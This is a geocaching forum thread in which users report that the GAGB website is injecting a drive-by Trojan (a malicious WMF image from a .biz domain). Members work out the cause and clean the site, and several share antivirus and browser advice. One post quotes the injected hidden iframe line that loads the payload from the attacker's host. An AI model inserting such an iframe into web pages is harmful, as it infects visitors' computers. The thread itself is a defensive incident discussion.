Jump to content

GAGB spawning a virus?

TheRoundings

By TheRoundings
in United Kingdom and Ireland

Followers 3

Recommended Posts

TheRoundings

+TheRoundings

Posted
Posted (edited)

I see that the site link:

http:// www.gagb.org.uk/forum (note space included so as to break the link)

is spawning:

http:// zebxmzbsx.biz/dll/adv631.php (again space included so as to break the link)

which is calling an image called:

xpladv631[1].wmf

 

This is blocked by my browser and is not something related to just my computer. This happens on two colleagues computers also.

 

Does anyone know what this?

Is it a virus?

 

I am concerned to visit the forums again on the GAGB site until I know what this is.

 

Duncan

 

EDIT: Update - this image is seen as a Trojan by McAfee VirusScan in my virus scanning logs

Edited by TheRoundings
Link to comment
TheRoundings

+TheRoundings

Posted
  • Author
Posted (edited)

Initially I was at work. I've now got home and tried from here and the same occurs. If you're not quick you will not see it. It only happens with the first session of GAGB in your browser or at least until the file is cached. Close your browser open again, then go to

http:// www.gagb.org.uk/forum.

 

After a short while the page is redirecting to

http:// www.gagb.lunarpages.com/forum/

which is normal then after a short duration you can see a load from http:// zebxmzbsx.biz/dll/adv631.php

 

This happens only after opening your browser and navigating the first time.

 

Edit: This happens with FF2.0 and IE7.

Edited by TheRoundings
Link to comment
rutson

+rutson

Posted
Posted

Yep, here's the offending code (line 247 of the index page):

 

<iframe src="http://zebxmzrbsx.biz/dl/adv631.php" width=1 height=1></iframe>

 

Looks to me like it's been hacked, though it's hardly surprising given the forum software is three years old and has a list of possible ways to attack it as long as your arm.

Link to comment
Bill D (wwh)

+Bill D (wwh)

Posted
Posted

We're aware of this. I'm quite au fait with the website, but Invision and MySQL aren't my line - I spent an age last night trying to find the problem, but with no success. Ian (Teasel), who's our webmaster, seems to be away at the moment and we can't get hold of him, so it looks as if we're stuck with this until he comes back.

 

If you're using an up-to-date AV program and a firewall this shouldn't be a problem. If you're not, you really should be.

 

---

Bill, Chairman GAGB

Link to comment
TheRoundings

+TheRoundings

Posted
  • Author
Posted

FF and IE were affected. It was nothing to do with the browser. Another page was automatically called after the main forum page which tried to load a Trojan windows metafile image. The security settings in each browser could've restricted it however most people relax their settings for more convenient browsing. In this case it was an easy catch for anyone with uptodate virus checking.

Link to comment
barryhunter

barryhunter

Posted
Posted (edited)

sorry, never received any email, but opening up the database now...

 

edit: ahh only just realised how soon I happened to check the forum, the email was still flying though the interweb :blink:

 

Anyway: the injected code has been removed, included the most basic of innocualtion, but I can forward findings to hopefully plug the hole!

Edited by barryhunter
Link to comment
drsolly

+drsolly

Posted
Posted

A couple of years ago, The Register (an online tech newsletter that I read most days) was hit by a "driveby". It was actually in their advertising, which is outsourced, but that's no comfort. Just by accessing the relevant advert(s) (which you had no choice in), an "iframe exploit" was installed on your computer (translation, a bunch of horrible was installed on your computer), which was really really difficult to remove (recommended method - reformat your disk and reinstall Windows).

 

It was after that, that I decided that using Internet Explorer (and Outlook) was just too difficult for me, and I switched. Many people use the Firefox browser, which seems to suffer from fewer of such problems. I went the whole hog, and dropped Windows in favour of Linux. This also means that I don't use (or, probably, need) an antivirus

 

Another part of the problem is false alarms, such as this one:

 

http://news.com.com/Microsoft+flags+Gmail+..._3-6135154.html

 

Currently, I'm getting send maybe a dozen viruses (or trojans, or, well, I don't ccare) per day in my email, and heaven knows what horriblenesses I'm accessing on the web, but it's all water off a geocacher's back, because they're all Windows-oriented.

 

Recommendation - check out Firefox, or any other browser that isn't Internet Explorer, because it's IE that the black hats are targeting.

 

Disclaimer - I no longer have any financial interest in any antivirus company.

Link to comment
sTeamTraen

+sTeamTraen

Posted
Posted

Most of the nasties seem to be written in Javascript and will have a fighting chance of working on Firefox as well. However, their binary payloads won't work on Linux :anicute:

 

I've just been put in charge of the network security team at work and I'm reviewing our site filtering policies. Currently we have an ineffectual 7-year-old list of porn sites and we block assorted malware providers as we detect them. But I'm thinking of just blocking *.biz and seeing if anyone calls!

Link to comment
barryhunter

barryhunter

Posted
Posted (edited)

... I thought I had posted this about 12.30, but got lost with the dodgy internet connection (it was still open in text editor used for spell checking) ...

 

Arrg! Gone again, interestingly it looks like its a person manually cracking into it as they adapted to get round the inoculation I applied. (It could be an automated virus breaking in, but the change is a definite shift in what was happening). If I get a chance over the weekend will have a look at the logs to see if can spot how its happening...

Edited by barryhunter
Link to comment
Edgemaster

Edgemaster

Posted
Posted (edited)

Get the forum software upgraded.

 

One entry point in php can give a cracker full access to the webserver it's hosted on.

 

I should also add, that once someone has one access point they'll quite often add backdoors in. Best way to go is to make sure you have clean copies of configuration and any template changes made and do a reinstall, nasty stuff can hide in there.

Edited by Edgemaster
Link to comment
Geotrotters

+Geotrotters

Posted
Posted

Yes - the new Intel ones can. I do it all the time and can run any Windows application on my Mac desktop without using an emulator :o.

 

I was just wondering, does the issue just affect IE users or does it affect Firefox too?

 

Can Mac run GSAK without a windows Emulator? :anibad:

 

Yes, you're running them without an emulator but you're still having to use Windows. (using Bootcamp or parallels). This will still leave you open to virus's in your Windows applications as it's the Mac OSX operating systems that's safe not the Windows install that's sitting on top of it.

 

The one plus point is that Parallels runs Windows in a virtual machine so the Virus will only affect the Windows install and not the complete mac software.

Link to comment
Bill D (wwh)

+Bill D (wwh)

Posted
Posted (edited)

It is at the moment... But any website is liable to get hacked, so make sure you're using an up-to-date antivirus program, and preferably a personal firewall too.

 

I use the free versions of Avast antivirus and Zone Labs firewall.

 

I continued to visit the GAGB forums during the periods the virus was there, and had no problems. I'm using Firefox, and I think Ff stopped the link opening, as I accessed the forums on my sister's computer using IE and Avast stopped the virus. On mine Avast never got to see the virus as it didn't get to me at all.

 

Edit to add: And make sure your antivirus and firewall are updated regularly - I have Avast and Zonelabs set to check automatically for updates.

Edited by Bill D (wwh)
Link to comment
stora

+stora

Posted
Posted (edited)
It is at the moment... But any website is liable to get hacked, so make sure you're using an up-to-date antivirus program, and preferably a personal firewall too.

 

I use the free versions of Avast antivirus and Zone Labs firewall.

 

I continued to visit the GAGB forums during the periods the virus was there, and had no problems. I'm using Firefox, and I think Ff stopped the link opening, as I accessed the forums on my sister's computer using IE and Avast stopped the virus. On mine Avast never got to see the virus as it didn't get to me at all.

 

Edit to add: And make sure your antivirus and firewall are updated regularly - I have Avast and Zonelabs set to check automatically for updates.

 

Doesn't sound very reassuring. I'll let MrsB go first and report if all is clear :laughing:

Edited by stora
Link to comment
The Blorenges

+The Blorenges

Posted
Posted

:D Joking aside...Just went back to GAGB and once again McAfee is immediately giving me pop-ups of Trojans and potentially harmful scripts being removed. I've never come across this before on any of the other sites that I drop into. McAfee is obviously "doing its stuff" and protecting my pc but I'm not inclined to hang around on the site knowing that it's regularly being infected. I won't be back until I feel confident that it's been properly cleaned up. :P

 

MrsB :D

Link to comment
Alice Band

+Alice Band

Posted
Posted (edited)

I visited the site tonight and my Anti-Virus went mad. Hmmm, judging by the speed and method that things are being re-inserted I wonder if the cause of it is reading this thread. Can you track some of the traffic? Surely this form of attack is manual, not bot? :P

I still remember the porn attacks this forum had recently - someone with a grudge?

Edited by Alice Band
Link to comment
barryhunter

barryhunter

Posted
Posted

It is removed, but as Bill mentioned AV should be installed as per the course (but a sad course of affiars!) anyway.

 

I should add that I have now been able to track at least one very suspiuous access. It 'browsed' the site too quick to be a real person, almost certainly a bot visiting.

I've blocked that computer and also installed tracking to get much more verbose info if it should happen again.

 

(previouslly been able to do little more than remove the naughty-code each time, nothing to really stop it happening again, but now been able to learn about the gagb website)

Link to comment
Alice Band

+Alice Band

Posted
Posted
I should add that I have now been able to track at least one very suspiuous access. It 'browsed' the site too quick to be a real person, almost certainly a bot visiting.

I've blocked that computer and also installed tracking to get much more verbose info if it should happen again.

:D A well-done for all your hard work Barry. Hopefully this is the last we hear of it. :P

Link to comment

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
Followers 3
Go to topic listing
×
×
  • Create New...